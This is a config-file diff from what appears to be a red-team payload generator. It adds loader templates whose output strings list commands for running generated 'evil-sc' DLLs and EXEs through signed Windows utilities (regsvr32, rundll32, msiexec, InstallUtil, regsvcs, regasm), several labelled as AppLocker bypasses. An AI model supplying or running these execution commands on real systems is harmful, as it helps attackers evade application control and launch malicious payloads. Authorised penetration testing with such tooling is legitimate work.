--- a/core/config/default.ini
+++ b/core/config/default.ini
@@ -79,6 +79,11 @@ output_format = .exe
 expected_format = RAW_BIN
 output_format = .exe
 
+[windows_cpp:CreateRemoteThread.dll]
+expected_format = RAW_BIN
+output_format = .dll
+custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\SysWOW64\msiexec.exe /y evil-sc.dll\nC:\Windows\SysWOW64\msiexec.exe /z evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\SysWOW64\regsvr32.exe /s evil-sc.dll\nC:\Windows\SysWOW64\rundll32.exe evil-sc.dll,EntryPoint\nx64:\nC:\Windows\System32\msiexec.exe /y evil-sc.dll\nC:\Windows\System32\msiexec.exe /z evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s /u evil-sc.dll\nC:\Windows\System32\regsvr32.exe /s evil-sc.dll\nC:\Windows\System32\rundll32.exe evil-sc.dll,EntryPoint
+
 [windows_cs:HalosGate]
 expected_format = RAW_BIN
 output_format = .exe
@@ -95,19 +100,19 @@ output_format = .exe
 expected_format = RAW_BIN
 output_format = .dll
 compiler_args = -r:System.Configuration.Install
-custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll"
+custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll
 
 [windows_cs:InstallUtilHollow]
 expected_format = RAW_BIN
 output_format = .exe
 compiler_args = -r:System.Configuration.Install
-custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
+custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker.\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe
 
 [windows_cs:InstallUtilPwsh]
 expected_format = TEXT
 output_format = .exe
 compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
-custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
+custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe
 
 [windows_cs:NtMapViewOfSection]
 expected_format = RAW_BIN
@@ -134,18 +139,30 @@ compiler_args = -r:core/templates/headers/System.Management.Automation.dll
 expected_format = RAW_BIN
 output_format = .exe
 compiler_args = -r:System.Configuration.Install
-custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
+custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker.\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe
 
 [windows_cs:Reflection]
 expected_format = DOTNET_BIN,DOTNET_DLL
 output_format = .exe
 
-[windows_cs:RegSvcsThread.dll]
+[windows_cs:RegSvcsRemoteThread.dll]
 expected_format = RAW_BIN
 output_format = .dll
 compiler_args = -r:System.EnterpriseServices
-custom_output = Run the dll using one of following commands: \nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll\n
+custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U evil-sc.dll\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U evil-sc.dll
 
+[windows_cs:RegSvcsPwsh.dll]
+expected_format = TEXT
+output_format = .dll
+compiler_args = -r:System.EnterpriseServices -r:core/templates/headers/System.Management.Automation.dll
+custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U evil-sc.dll\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U evil-sc.dll
+
+
+[windows_cs:OdbcconfRemoteThread.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.EnterpriseServices
+custom_output = Run the dll using one of following commands: \nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U evil-sc.dll\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U evil-sc.dll
 
 
 [windows_js:VenomaToJs]
